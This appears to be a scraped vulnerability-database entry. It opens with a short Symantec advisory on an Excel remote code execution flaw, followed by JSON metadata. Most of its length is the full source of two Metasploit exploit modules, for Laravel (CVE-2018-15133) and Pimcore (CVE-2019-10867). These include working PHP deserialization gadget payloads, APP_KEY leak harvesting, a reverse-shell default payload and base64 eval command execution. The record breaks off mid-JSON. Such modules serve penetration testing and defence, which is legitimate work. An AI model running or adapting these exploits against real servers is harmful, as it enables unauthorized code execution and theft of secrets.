Microsoft Excel Name Record Array Remote Code Execution Vulnerability
2008-12-09T00:00:00
ID SMNTC-32622 Type symantec Reporter Symantec Security Response Modified 2008-12-09T00:00:00
Description
Description
Microsoft Excel is prone to a remote code-execution vulnerability. Attackers may exploit this issue by enticing victims into opening a maliciously crafted Excel file. Successful exploits may allow attackers to execute arbitrary code with the privileges of the user running the application.
Technologies Affected
Microsoft Excel 2000 SP3
Microsoft Excel 2002 SP3
Microsoft Excel 2003 SP3
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office Excel Viewer 2003
Microsoft Office Excel Viewer 2003 SP3
Microsoft Open XML File Format Converter for Mac
Recommendations
Run all software as a nonprivileged user with minimal access rights.
To reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.
Do not accept or execute files from untrusted or unknown sources.
To reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.
Do not follow links provided by unknown or untrusted sources.
Web users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.
Implement multiple redundant layers of security.
Since this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.
Microsoft has released a security bulletin along with fixes that address this vulnerability.
{"hash": "918b7af4067f5178c1175119ed9f72615c9f46b2fe884f76ba10c5053a2f9989", "id": "SMNTC-32622", "lastseen": "2018-03-12T12:26:11", "viewCount": 1, "hashmap": [{"hash": "617f44b3b3f502c65f0c0604b972bc45", "key": "affectedSoftware"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "2a86988c382f1cc347103e1796b6aeb3", "key": "description"}, {"hash": "082ae8789d1731a465ff1bd6148d09e7", "key": "href"}, {"hash": "cffc4a21ec9864b1f88227b45e4fc885", "key": "modified"}, {"hash": "cffc4a21ec9864b1f88227b45e4fc885", "key": "published"}, {"hash": "137ae33a1dca7a953380768cddf35a71", "key": "references"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}, {"hash": "bbd50599d089312c04eb6e51ece35010", "key": "title"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}], "bulletinFamily": "software", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 1.2, "vector": "NONE", "modified": "2018-03-12T12:26:11"}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/F5_BIGIP_VIRTUAL_SERVER", "MSF:AUXILIARY/SCANNER/HTTP/MANAGEENGINE_DESKTOP_CENTRAL_LOGIN", "MSF:AUXILIARY/SCANNER/HTTP/CHEF_WEBUI_LOGIN", "MSF:AUXILIARY/SCANNER/HTTP/OWA_LOGIN", "MSF:EXPLOIT/WINDOWS/FTP/FREEFTPD_PASS", "MSF:AUXILIARY/SCANNER/HTTP/CISCO_ASA_ASDM", "MSF:EXPLOIT/WINDOWS/BRIGHTSTOR/TAPE_ENGINE_0X8A", "MSF:EXPLOIT/MULTI/HTTP/EATON_NSM_CODE_EXEC", "MSF:EXPLOIT/WINDOWS/FTP/SAMI_FTPD_LIST", "MSF:EXPLOIT/WINDOWS/FTP/FREEFLOATFTP_WBEM"]}], "modified": "2018-03-12T12:26:11"}, "vulnersScore": 1.2}, "type": "symantec", "description": "### Description\n\nMicrosoft Excel is prone to a remote code-execution vulnerability. Attackers may exploit this issue by enticing victims into opening a maliciously crafted Excel file. Successful exploits may allow attackers to execute arbitrary code with the privileges of the user running the application.\n\n### Technologies Affected\n\n * Microsoft Excel 2000 SP3 \n * Microsoft Excel 2002 SP3 \n * Microsoft Excel 2003 SP3 \n * Microsoft Office 2004 for Mac \n * Microsoft Office 2008 for Mac \n * Microsoft Office Excel Viewer 2003 \n * Microsoft Office Excel Viewer 2003 SP3 \n * Microsoft Open XML File Format Converter for Mac \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities.\n\nMicrosoft has released a security bulletin along with fixes that address this vulnerability.\n", "title": "Microsoft Excel Name Record Array Remote Code Execution Vulnerability", "history": [{"bulletin": {"hash": "5761ddd0d194606e4bee0ecc52af7dac61c96c01f7802cf92025fae367d23cbe", "viewCount": 1, "edition": 1, "lastseen": "2016-09-04T11:42:43", "history": [], "objectVersion": "1.2", "hashmap": [{"hash": "7a77efe4834e85557526e500d9b9be70", "key": "affectedSoftware"}, {"hash": "bbd50599d089312c04eb6e51ece35010", "key": "title"}, {"hash": "b53054d10a030c7f2d0ee27ccaaf17e3", "key": "href"}, {"hash": "cffc4a21ec9864b1f88227b45e4fc885", "key": "modified"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "cffc4a21ec9864b1f88227b45e4fc885", "key": "published"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "137ae33a1dca7a953380768cddf35a71", "key": "references"}, {"hash": "108263b9fa9a57e8dfecde8f9d493e07", "key": "description"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}], "cvelist": [], "bulletinFamily": "software", "published": "2008-12-09T00:00:00", "description": "### Description\n\nMicrosoft Excel is prone to a remote code-execution vulnerability. Attackers may exploit this issue by enticing victims into opening a maliciously crafted Excel file. Successful exploits may allow attackers to execute arbitrary code with the privileges of the user running the application. \n\n### Technologies Affected\n\n * Microsoft Excel 2000 SP3\n * Microsoft Excel 2002 SP3\n * Microsoft Excel 2003 SP3\n * Microsoft Office 2004 for Mac\n * Microsoft Office 2008 for Mac\n * Microsoft Office Excel Viewer 2003\n * Microsoft Office Excel Viewer 2003 SP3\n * Microsoft Open XML File Format Converter for Mac\n\n### Recommendations\n\n#### Run all software as a nonprivileged user with minimal access rights.\n\nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n#### Do not accept or execute files from untrusted or unknown sources.\n\nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n#### Do not follow links provided by unknown or untrusted sources.\n\nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n#### Implement multiple redundant layers of security.\n\nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploits of memory-corruption vulnerabilities. \n\nMicrosoft has released a security bulletin along with fixes that address this vulnerability. \n", "cvss": {"score": 0.0, "vector": "NONE"}, "id": "SMNTC-32622", "reporter": "Symantec Security Response", "references": ["http://secunia.com/secunia_research/2008-36/"], "affectedSoftware": [{"version": "2003", "name": "Microsoft Office Excel Viewer", "operator": "eq"}, {"version": "2000 SP3", "name": "Microsoft Excel", "operator": "eq"}, {"version": "Mac", "name": "Microsoft Office 2004 for", "operator": "eq"}, {"version": "2003 SP3", "name": "Microsoft Excel", "operator": "eq"}, {"version": "Mac", "name": "Microsoft Office 2008 for", "operator": "eq"}, {"version": "2002 SP3", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2003 SP3", "name": "Microsoft Office Excel Viewer", "operator": "eq"}, {"version": "any", "name": "Microsoft Open XML File Format Converter for Mac", "operator": "eq"}], "title": "Microsoft Excel Name Record Array Remote Code Execution Vulnerability", "modified": "2008-12-09T00:00:00", "enchantments": {"score": {"value": 8.5, "modified": "2016-09-04T11:42:43"}}, "href": "https://www.symantec.com/security_response/vulnerability.jsp?bid=32622", "type": "symantec"}, "lastseen": "2016-09-04T11:42:43", "edition": 1, "differentElements": ["description", "href", "affectedSoftware"]}], "objectVersion": "1.3", "cvelist": [], "published": "2008-12-09T00:00:00", "references": ["http://secunia.com/secunia_research/2008-36/"], "reporter": "Symantec Security Response", "affectedSoftware": [{"version": "2002 SP3 ", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2003 ", "name": "Microsoft Office Excel Viewer", "operator": "eq"}, {"version": "2003 SP3 ", "name": "Microsoft Excel", "operator": "eq"}, {"version": "2008 for Mac ", "name": "Microsoft Office", "operator": "eq"}, {"version": "2004 for Mac ", "name": "Microsoft Office", "operator": "eq"}, {"version": "2003 SP3 ", "name": "Microsoft Office Excel Viewer", "operator": "eq"}, {"version": "2000 SP3 ", "name": "Microsoft Excel", "operator": "eq"}], "modified": "2008-12-09T00:00:00", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/32622"}
{"metasploit": [{"lastseen": "2019-12-04T20:29:10", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29. Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php. Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY. Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix. In some cases the APP_KEY is leaked which allows for discovery and exploitation.\n", "modified": "2019-07-12T14:08:15", "published": "2019-07-07T14:50:13", "id": "MSF:EXPLOIT/UNIX/HTTP/LARAVEL_TOKEN_UNSERIALIZE_EXEC", "href": "", "type": "metasploit", "title": "PHP Laravel Framework token Unserialize Remote Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PHP Laravel Framework token Unserialize Remote Command Execution',\n 'Description' => %q{\n This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29.\n Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to\n an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php.\n Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY.\n Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix.\n In some cases the APP_KEY is leaked which allows for discovery and exploitation.\n },\n 'DisclosureDate' => '2018-08-07',\n 'Author' =>\n [\n 'St\u00e5le Pettersen', # Discovery\n 'aushack', # msf exploit + other leak\n ],\n 'References' =>\n [\n ['CVE', '2018-15133'],\n ['CVE', '2017-16894'],\n ['URL', 'https://github.com/kozmic/laravel-poc-CVE-2018-15133'],\n ['URL', 'https://laravel.com/docs/5.6/upgrade#upgrade-5.6.30'],\n ['URL', 'https://github.com/laravel/framework/pull/25121/commits/d84cf988ed5d4661a4bf1fdcb08f5073835083a0']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'DefaultTarget' => 0,\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },\n 'Payload' => { 'DisableNops' => true },\n 'Targets' => [[ 'Automatic', {} ]],\n ))\n\n register_options([\n OptString.new('TARGETURI', [ true, 'Path to target webapp', '/']),\n OptString.new('APP_KEY', [ false, 'The base64 encoded APP_KEY string from the .env file', ''])\n ])\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'method' => 'GET'\n })\n\n # Can be 'XSRF-TOKEN', 'X-XSRF-TOKEN', 'laravel_session', or $appname_session... and maybe more?\n unless res && res.headers && res.headers.to_s =~ /XSRF-TOKEN|laravel_session/i\n return CheckCode::Unknown\n end\n\n auth_token = check_appkey\n if auth_token.blank? || test_appkey(auth_token) == false\n vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.'\n return CheckCode::Detected\n end\n\n random_string = Rex::Text.rand_text_alphanumeric(12)\n\n 1.upto(4) do |method|\n vuln = generate_token(\"echo #{random_string}\", auth_token, method)\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'method' => 'POST',\n 'headers' => {\n 'X-XSRF-TOKEN' => \"#{vuln}\",\n }\n })\n\n if res.body.include?(random_string)\n return CheckCode::Vulnerable\n # Not conclusive but witnessed in the wild\n elsif res.body.include?('Method Not Allowed')\n return CheckCode::Safe\n end\n end\n CheckCode::Detected\n rescue Rex::ConnectionError\n CheckCode::Unknown\n end\n\n def env_leak\n key = ''\n vprint_status 'Checking for CVE-2017-16894 .env information leak'\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, '.env'),\n 'method' => 'GET'\n })\n\n # Good but may be other software. Can also check for 'APP_NAME=Laravel' etc\n return key unless res && res.body.include?('APP_KEY') && res.body =~ /APP_KEY\\=base64:(.*)/\n key = $1\n\n if key\n vprint_good \"APP_KEY Found via CVE-2017-16894 .env information leak: #{key}\"\n return key\n end\n\n vprint_status 'Website .env file exists but didn\\'t find a suitable APP_KEY'\n key\n end\n\n def framework_leak(decrypt_ex = true)\n key = ''\n if decrypt_ex\n # Possible config error / 0day found by aushack during pentest\n # Seen in the wild with recent releases\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'method' => 'POST',\n 'headers' => {\n 'X-XSRF-TOKEN' => Rex::Text.rand_text_alpha(1) # May trigger\n }\n })\n\n return key unless res && res.body.include?('DecryptException') && res.body.include?('APP_KEY')\n else\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'method' => 'POST'\n })\n\n return key unless res && res.body.include?('MethodNotAllowedHttpException') && res.body.include?('APP_KEY')\n end\n # Good sign but might be more universal with e.g. 'vendor/laravel/framework' ?\n\n # Leaks all environment config including passwords for databases, AWS, REDIS, SMTP etc... but only the APP_KEY appears to use base64\n if res.body =~ /\\>base64:(.*)\\<\\/span\\>/\n key = $1\n vprint_good \"APP_KEY Found via Laravel Framework error information leak: #{key}\"\n end\n\n key\n end\n\n def check_appkey\n key = datastore['APP_KEY'].present? ? datastore['APP_KEY'] : ''\n return key unless key.empty?\n\n vprint_status 'APP_KEY not set. Will try to find it...'\n key = env_leak\n key = framework_leak if key.empty?\n key = framework_leak(false) if key.empty?\n key.empty? ? false : key\n end\n\n def test_appkey(value)\n value = Rex::Text.decode_base64(value)\n return true if value && value.length.to_i == 32\n\n false\n end\n\n def generate_token(cmd, key, method)\n # Ported phpggc Laravel RCE php objects :)\n case method\n when 1\n payload_decoded = 'O:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":2:{s:9:\"' + \"\\x00\" + '*' + \"\\x00\" + 'events\";O:15:\"Faker\\Generator\":1:{s:13:\"' + \"\\x00\" + '*' + \"\\x00\" + 'formatters\";a:1:{s:8:\"dispatch\";s:6:\"system\";}}s:8:\"' + \"\\x00\" + '*' + \"\\x00\" + 'event\";s:' + cmd.length.to_s + ':\"' + cmd + '\";}'\n when 2\n payload_decoded = 'O:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":2:{s:9:\"' + \"\\x00\" + '*' + \"\\x00\" + 'events\";O:28:\"Illuminate\\Events\\Dispatcher\":1:{s:12:\"' + \"\\x00\" + '*' + \"\\x00\" + 'listeners\";a:1:{s:' + cmd.length.to_s + ':\"' + cmd + '\";a:1:{i:0;s:6:\"system\";}}}s:8:\"' + \"\\x00\" + '*' + \"\\x00\" + 'event\";s:' + cmd.length.to_s + ':\"' + cmd + '\";}'\n when 3\n payload_decoded = 'O:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":1:{s:9:\"' + \"\\x00\" + '*' + \"\\x00\" + 'events\";O:39:\"Illuminate\\Notifications\\ChannelManager\":3:{s:6:\"' + \"\\x00\" + '*' + \"\\x00\" + 'app\";s:' + cmd.length.to_s + ':\"' + cmd + '\";s:17:\"' + \"\\x00\" + '*' + \"\\x00\" + 'defaultChannel\";s:1:\"x\";s:17:\"' + \"\\x00\" + '*' + \"\\x00\" + 'customCreators\";a:1:{s:1:\"x\";s:6:\"system\";}}}'\n when 4\n payload_decoded = 'O:40:\"Illuminate\\Broadcasting\\PendingBroadcast\":2:{s:9:\"' + \"\\x00\" + '*' + \"\\x00\" + 'events\";O:31:\"Illuminate\\Validation\\Validator\":1:{s:10:\"extensions\";a:1:{s:0:\"\";s:6:\"system\";}}s:8:\"' + \"\\x00\" + '*' + \"\\x00\" + 'event\";s:' + cmd.length.to_s + ':\"' + cmd + '\";}'\n end\n\n cipher = OpenSSL::Cipher.new('AES-256-CBC') # Or AES-128-CBC - untested\n cipher.encrypt\n cipher.key = Rex::Text.decode_base64(key)\n iv = cipher.random_iv\n\n value = cipher.update(payload_decoded) + cipher.final\n pload = Rex::Text.encode_base64(value)\n iv = Rex::Text.encode_base64(iv)\n mac = OpenSSL::HMAC.hexdigest('SHA256', Rex::Text.decode_base64(key), iv+pload)\n iv = iv.gsub('/', '\\\\/') # Escape slash\n pload = pload.gsub('/', '\\\\/') # Escape slash\n json_value = %Q({\"iv\":\"#{iv}\",\"value\":\"#{pload}\",\"mac\":\"#{mac}\"})\n json_out = Rex::Text.encode_base64(json_value)\n\n json_out\n end\n\n def exploit\n auth_token = check_appkey\n if auth_token.blank? || test_appkey(auth_token) == false\n vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.'\n return\n end\n\n 1.upto(4) do |method|\n sploit = generate_token(payload.encoded, auth_token, method)\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'method' => 'POST',\n 'headers' => {\n 'X-XSRF-TOKEN' => sploit,\n }\n }, 5)\n\n # Stop when one of the deserialization attacks works\n break if session_created?\n\n if res && res.body.include?('The MAC is invalid|Method Not Allowed') # Not conclusive\n print_status 'Target appears to be patched or otherwise immune'\n end\n end\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/http/laravel_token_unserialize_exec.rb"}, {"lastseen": "2019-11-23T06:25:00", "bulletinFamily": "exploit", "description": "This module exploits a PHP unserialize() in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with \"classes\" permission could exploit the vulnerability. The vulnerability exists in the \"ClassController.php\" class, where the \"bulk-commit\" method makes it possible to exploit the unserialize function when passing untrusted values in \"data\" parameter. Tested on Pimcore 5.4.0-5.4.4, 5.5.1-5.5.4, 5.6.0-5.6.6 with the Symfony unserialize payload. Tested on Pimcore 4.0.0-4.6.5 with the Zend unserialize payload.\n", "modified": "2019-04-29T13:43:33", "published": "2019-04-07T20:44:02", "id": "MSF:EXPLOIT/MULTI/HTTP/PIMCORE_UNSERIALIZE_RCE", "href": "", "type": "metasploit", "title": "Pimcore Unserialize RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => \"Pimcore Unserialize RCE\",\n 'Description' => %q(\n This module exploits a PHP unserialize() in Pimcore before 5.7.1 to\n execute arbitrary code. An authenticated user with \"classes\" permission\n could exploit the vulnerability.\n\n The vulnerability exists in the \"ClassController.php\" class, where the\n \"bulk-commit\" method makes it possible to exploit the unserialize function\n when passing untrusted values in \"data\" parameter.\n\n Tested on Pimcore 5.4.0-5.4.4, 5.5.1-5.5.4, 5.6.0-5.6.6 with the Symfony\n unserialize payload.\n\n Tested on Pimcore 4.0.0-4.6.5 with the Zend unserialize payload.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Daniele Scanu', # Discovery & PoC\n 'Fabio Cogno' # Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2019-10867'],\n ['URL', 'https://github.com/pimcore/pimcore/commit/38a29e2f4f5f060a73974626952501cee05fda73'],\n ['URL', 'https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-173998']\n ],\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['Pimcore 5.x (Symfony unserialize payload)', 'type' => :symfony],\n ['Pimcore 4.x (Zend unserialize payload)', 'type' => :zend]\n ],\n 'Payload' => {\n 'Space' => 8000,\n 'DisableNops' => true\n },\n 'Privileged' => false,\n 'DisclosureDate' => \"Mar 11 2019\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, \"Base Pimcore directory path\", '/']),\n OptString.new('USERNAME', [true, \"Username to authenticate with\", '']),\n OptString.new('PASSWORD', [false, \"Password to authenticate with\", ''])\n ]\n )\n end\n\n def login\n # Try to login\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'admin', 'login', 'login'),\n 'vars_post' => {\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD']\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, 'Connection failed')\n end\n\n if res.code == 302 && res.headers['Location'] =~ /\\/admin\\/\\?_dc=/\n print_good(\"Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n\n # Grabbing CSRF token and PHPSESSID cookie\n return grab_csrftoken(res)\n end\n\n if res.code == 302 && res.headers['Location'] =~ /auth_failed=true/\n fail_with(Failure::NoAccess, 'Invalid credentials')\n end\n\n fail_with(Failure::NoAccess, 'Authentication was unsuccessful')\n end\n\n def grab_csrftoken(auth_res)\n uri = \"#{target_uri.path}admin/?_dc=#{auth_res.headers['Location'].scan(/\\/admin\\/\\?_dc=([0-9]+)/).flatten.first}\"\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(uri),\n 'cookie' => auth_res.get_cookies\n )\n\n if res && res.code == 200\n # Pimcore 5.x\n unless res.body.scan(/\"csrfToken\": \"[a-z0-9]+\",/).empty?\n @csrf_token = res.body.scan(/\"csrfToken\": \"([a-z0-9]+)\",/).flatten.first.to_s\n @pimcore_cookies = res.get_cookies.scan(/(PHPSESSID=[a-z0-9]+;)/).flatten[0]\n fail_with(Failure::NotFound, 'Failed to retrieve cookies') unless @pimcore_cookies\n @pimcore_cookies << \" pimcore_admin_sid=1;\"\n\n # Version\n version = res.body.scan(/\"pimcore platform \\(v([0-9]{1}\\.[0-9]{1}\\.[0-9]{1})\\|([a-z0-9]+)\\)\"/i).flatten[0]\n build = res.body.scan(/\"pimcore platform \\(v([0-9]{1}\\.[0-9]{1}\\.[0-9]{1})\\|([a-z0-9]+)\\)\"/i).flatten[1]\n fail_with(Failure::NotFound, 'Failed to retrieve the version and build') unless version && build\n print_version(version, build)\n return assign_target(version)\n end\n\n # Pimcore 4.x\n unless res.body.scan(/csrfToken: \"[a-z0-9]+\",/).empty?\n @csrf_token = res.body.scan(/csrfToken: \"([a-z0-9]+)\",/).flatten.first.to_s\n @pimcore_cookies = res.get_cookies.scan(/(pimcore_admin_sid=[a-z0-9]+;)/).flatten[0]\n fail_with(Failure::NotFound, 'Unable to retrieve cookies') unless @pimcore_cookies\n\n # Version\n version = res.body.scan(/version: \"([0-9]{1}\\.[0-9]{1}\\.[0-9]{1})\",/i).flatten[0]\n build = res.body.scan(/build: \"([0-9]+)\",/i).flatten[0]\n fail_with(Failure::NotFound, 'Failed to retrieve the version and build') unless version && build\n print_version(version, build)\n return assign_target(version)\n end\n\n # Version different from 4.x or 5.x\n return nil\n else\n fail_with(Failure::NoAccess, 'Failed to grab csrfToken and PHPSESSID')\n end\n end\n\n def print_version(version, build)\n print_status(\"Pimcore version: #{version}\")\n print_status(\"Pimcore build: #{build}\")\n end\n\n def assign_target(version)\n if Gem::Version.new(version) >= Gem::Version.new('5.0.0') && Gem::Version.new(version) <= Gem::Version.new('5.6.6')\n print_good(\"The target is vulnerable!\")\n return targets[0]\n elsif Gem::Version.new(version) >= Gem::Version.new('4.0.0') && Gem::Version.new(version) <= Gem::Version.new('4.6.5')\n print_good(\"The target is vulnerable!\")\n return targets[1]\n else\n print_error(\"The target is NOT vulnerable!\")\n return nil\n end\n end\n\n def upload\n # JSON file payload\n fpayload = \"{\\\"customlayout\\\":[{\\\"creationDate\\\": \\\"#{rand(1..9)}\\\", \\\"modificationDate\\\": \\\"#{rand(1..9)}\\\", \\\"userOwner\\\": \\\"#{rand(1..9)}\\\", \\\"userModification\\\": \\\"#{rand(1..9)}\\\"}]}\"\n # construct POST data\n data = Rex::MIME::Message.new\n data.add_part(fpayload, 'application/json', nil, \"form-data; name=\\\"Filedata\\\"; filename=\\\"#{rand_text_alphanumeric(3..9)}.json\\\"\")\n\n # send JSON file payload to bulk-import function\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'admin', 'class', 'bulk-import'),\n 'vars_get' => { 'csrfToken' => @csrf_token },\n 'cookie' => @pimcore_cookies,\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data.to_s\n )\n\n unless res\n fail_with(Failure::Unreachable, 'Connection failed')\n end\n\n if res.code == 200\n json = res.get_json_document\n if json['success'] == true\n print_good(\"JSON payload uploaded successfully: #{json['filename']}\")\n return json['filename']\n else\n print_warning('Could not determine JSON payload file upload')\n return nil\n end\n end\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'admin', 'login')\n )\n\n unless res\n return Exploit::CheckCode::Unknown\n end\n\n if res.code == 200 && res.headers =~ /pimcore/i || res.body =~ /pimcore/i\n return Exploit::CheckCode::Detected\n end\n\n return Exploit::CheckCode::Unknown\n end\n\n def exploit\n # Try to log in, grab csrfToken and select target\n my_target = login\n if my_target.nil?\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')\n end\n\n # Try to upload JSON payload file\n fname = upload\n\n unless fname.nil?\n # Register uploaded JSON payload file for cleanup\n register_files_for_cleanup(fname)\n end\n\n print_status(\"Selected payload: #{my_target.name}\")\n\n case my_target['type']\n when :symfony\n # The payload to execute\n spayload = \"php -r 'eval(base64_decode(\\\"#{Rex::Text.encode_base64(payload.encoded)}\\\"));'\"\n\n # The Symfony object payload\n serialize = \"O:43:\\\"Symfony\\\\Component\\\\Cache\\\\Adapter\\\\ApcuAdapter\\\":3:{\"\n serialize << \"s:64:\\\"\\x00Symfony\\\\Component\\\\Cache\\\\Adapter\\\\AbstractAdapter\\x00mergeByLifetime\\\";\"\n serialize << \"s:9:\\\"proc_open\\\";\"\n serialize << \"s:58:\\\"\\x00Symfony\\\\Component\\\\Cache\\\\Adapter\\\\AbstractAdapter\\x00namespace\\\";a:0:{}\"\n serialize << \"s:57:\\\"\\x00Symfony\\\\Component\\\\Cache\\\\Adapter\\\\AbstractAdapter\\x00deferred\\\";\"\n serialize << \"s:#{spayload.length}:\\\"#{spayload}\\\";}\"\n when :zend\n # The payload to execute\n spayload = \"eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));\"\n\n # The Zend1 object payload\n serialize = \"a:2:{i:7;O:8:\\\"Zend_Log\\\":1:{s:11:\\\"\\x00*\\x00_writers\\\";a:1:{\"\n serialize << \"i:0;O:20:\\\"Zend_Log_Writer_Mail\\\":5:{s:16:\\\"\\x00*\\00_eventsToMail\\\";a:1:{\"\n serialize << \"i:0;i:1;}s:22:\\\"\\x00*\\x00_layoutEventsToMail\\\";a:0:{}s:8:\\\"\\00*\\x00_mail\\\";\"\n serialize << \"O:9:\\\"Zend_Mail\\\":0:{}s:10:\\\"\\x00*\\x00_layout\\\";O:11:\\\"Zend_Layout\\\":3:{\"\n serialize << \"s:13:\\\"\\x00*\\x00_inflector\\\";O:23:\\\"Zend_Filter_PregReplace\\\":2:{\"\n serialize << \"s:16:\\\"\\x00*\\x00_matchPattern\\\";s:7:\\\"/(.*)/e\\\";s:15:\\\"\\x00*\\x00_replacement\\\";\"\n serialize << \"S:#{spayload.length}:\\\"#{spayload}\\\";}\"\n serialize << \"s:20:\\\"\\x00*\\x00_inflectorEnabled\\\";b:1;s:10:\\\"\\x00*\\x00_layout\\\";\"\n serialize << \"s:6:\\\"layout\\\";}s:22:\\\"\\x00*\\x00_subjectPrependText\\\";N;}}};i:7;i:7;}\"\n end\n\n # send serialized payload\n send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri, 'admin', 'class', 'bulk-commit'),\n 'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',\n 'cookie' => @pimcore_cookies,\n 'vars_post' => {\n 'filename' => fname,\n 'data' => JSON.generate(\n 'type' => 'customlayout',\n 'name' => serialize\n )\n },\n 'headers' => {\n 'X-pimcore-csrf-token' => @csrf_token\n }\n }, 30\n )\n end\nend\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": 